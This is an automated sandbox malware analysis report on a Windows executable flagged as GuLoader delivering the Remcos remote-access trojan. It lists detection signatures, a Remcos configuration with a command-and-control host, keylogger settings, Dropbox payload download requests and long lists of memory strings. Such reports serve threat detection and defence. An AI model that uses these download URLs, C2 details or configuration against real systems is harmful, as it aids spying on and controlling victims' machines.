Windows Analysis Report
25FC004658_Femetagershusenes.exe

Overview

General Information

Sample name: 25FC004658_Femetagershusenes.exe
Analysis ID: 1650816
MD5: 77221f5f2a4984872389759b83446a62
SHA1: 07c1d4795c8ec52dff45be198abde62c331ded59
SHA256: d67a5911a1cca695a8e3514e1155c6cc8ace4c1a6b96daf563f6ae3134c6d588
Tags: exeuser-threatcat_ch
Infos:

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Antivirus detection for URL or domain
Source: parosh.didns.ru Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["parosh.didns.ru:3011:1"], "Assigned name": "PAROSH NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "psh983mn-LGLX6H", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "polshmy"}
Multi AV Scanner detection for submitted file
Source: 25FC004658_Femetagershusenes.exe Virustotal: Detection: 12% Perma Link
Yara detected Remcos RAT
Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR
Source: IMCCPHR.exe, 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_3644f444-f

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR
Uses 32bit PE files
Source: 25FC004658_Femetagershusenes.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 162.125.6.18:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.125.6.15:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: 25FC004658_Femetagershusenes.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 0_2_00405974
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004064C6 FindFirstFileW,FindClose, 0_2_004064C6
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: parosh.didns.ru
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.125.6.15 162.125.6.15
Source: Joe Sandbox View IP Address: 162.125.6.18 162.125.6.18
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49725 -> 162.125.6.18:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /scl/fi/0jhi0626x7zqfgid1v9te/UjzebvskPbXnryFB92.bin?rlkey=65dc2nu7arz5szq4evadjxcxz&st=xm70zo43&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: www.dropbox.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /cd/0/get/CmsIyjcNSqE9pfci-uOQ5iPpUwthde2j5Gu-YHxpenRoUwO-5aFF-26QH3jJ5w1vsnC9n0X7MK9TbekEndvfLddUc1vukyol79nTDWgL_oeOOnkft5YyRStzi2xNvs2hekNlJcWK0ut_zuTPuhb46702/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /scl/fi/0jhi0626x7zqfgid1v9te/UjzebvskPbXnryFB92.bin?rlkey=65dc2nu7arz5szq4evadjxcxz&st=xm70zo43&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: www.dropbox.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /cd/0/get/CmsIyjcNSqE9pfci-uOQ5iPpUwthde2j5Gu-YHxpenRoUwO-5aFF-26QH3jJ5w1vsnC9n0X7MK9TbekEndvfLddUc1vukyol79nTDWgL_oeOOnkft5YyRStzi2xNvs2hekNlJcWK0ut_zuTPuhb46702/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.comConnection: Keep-Alive
Source: IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://apis.google.com/js/ 'nonce-GtDgp8MmJsd5MzF8YgyAEsxNpZM=' ; frame-ancestors 'self' https://*.dropbox.com ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
Source: IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: opbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: www.dropbox.com
Source: global traffic DNS traffic detected: DNS query: uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com
Source: IMCCPHR.exe, 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 25FC004658_Femetagershusenes.exe, Funktionsafprvningerne.exe.0.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://a.sprig.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/gsi/client
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.login.yahoo.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com/js/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://app.hellofax.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://app.hellosign.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://canny.io/sdk.js
Source: IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cfl.dropboxstatic.com/static/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dl-web.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/fsip/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/fsip/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/fsip/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.sandbox.google.com/document/fsip/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docsend.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://experience.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.dropbox.coKh$
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.yahoo.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://navi.dropbox.jp/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://officeapps-df.live.com
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://officeapps.live.com
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/picker
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pal-test.adyen.com
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paper.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://photos.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sales.dropboxbusiness.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://showcase.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/(
Source: IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/6t
Source: IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/7
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/R
